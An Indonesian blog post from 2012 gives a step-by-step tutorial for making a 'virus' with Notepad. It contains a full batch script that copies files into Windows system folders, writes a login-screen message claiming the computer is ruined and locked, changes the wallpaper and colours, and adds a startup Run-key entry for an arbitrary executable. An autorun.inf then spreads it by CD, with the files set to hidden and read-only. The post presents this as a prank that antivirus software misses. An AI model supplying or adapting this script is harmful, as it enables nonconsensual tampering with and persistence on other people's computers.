Sunday, 5 February 2012

Cara Membuat virus Dengan Notepad

Cara Membuat virus Dengan Notepad - Di artikel kali ini Tontenk akan membahas tentang Cara Membuat virus Dengan Notepad. Buata sobat yang pengen nyoba atau cuma iseng buat virus dengan notepad nih Tontenk kasih tutorialnya. Virus ini memang efek gak terlalu bahaya efeknya yaitu cuma mengganti tampilan dari windows, tapi mungkin bikin cukup kanget juga'!!! dan anehnya gak ke-detect sama antivirus [setahu saya]. Ok sobat gak usah lama-lama deh langsung saja nih cara nya.

Cara Membuat virus Dengan Notepad

  • Buka Notepadnya lalu copy script dibawah ini
@echo off
copy image_name(terserah dari nama file gambar pembuat).bmp %systemdrive%\ /y
copy image_name(terserah dari nama file gambar pembuat).bmp %systemdrive%\WINDOWS\ /y
copy image_name(terserah dari nama file gambar pembuat).bmp %systemdrive%\WINDOWS\system32\ /y
copy nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe %systemdrive%\ /y
copy nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe %systemdrive%\WINDOWS\ /y
copy nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe %systemdrive%\WINDOWS\system32\ /y
reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon” /v LegalNoticeCaption /d “WARNING MESSAGE FROM LOCAL_HOST(judul title bar)” /f
reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon” /v LegalNoticeText /d “I HAVE RUINED YOUR COMPUTER AND YOUR COMPUTER IS LOCKED(pesan pembuat)” /f
reg add “HKEY_CURRENT_USER\Control Panel\Desktop” /v Wallpaper /d %systemdrive%\WINDOWS\system32\image_name(terserah dari nama file gambar pembuat).bmp /f
reg add “HKEY_CURRENT_USER\Control Panel\Desktop” /v WallpaperStyle /d 0 /f
reg add “HKEY_USERS\.DEFAULT\Control Panel\Desktop” /v Wallpaper /d %systemdrive%\WINDOWS\system32\image_name(terserah dari nama file gambar pembuat).bmp /f
reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run” /v nama_terserah /d %systemdrive%\windows\system32\nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe /f
reg add “HKEY_CURRENT_USER/Control Panel/Colors” /v window /d #000000(atau kombinasi warna RGB lain,cari pake Adobe Photoshop) /f

  • Lalu di "SAVE ALL FILE" dengan extensi .bat (nama_file.bat)
  • Buat Autorun.inf dengan script
[autorun]
open=nama_file.bat

  • Lalu di "SAVE ALL FILE" dengan extensi .inf (Autorun.inf)
  • File -file tersebut harus dalam 1 direktori, lalu seleksi file-file tersebut dengan cara klik kanan
    pilih Properties beri tanda check pada Hidden dan Read-Only
  • Copy file-file tersebut ke CD
  • Nikmati efeknya.. ahihi

    No comments:

    Post a Comment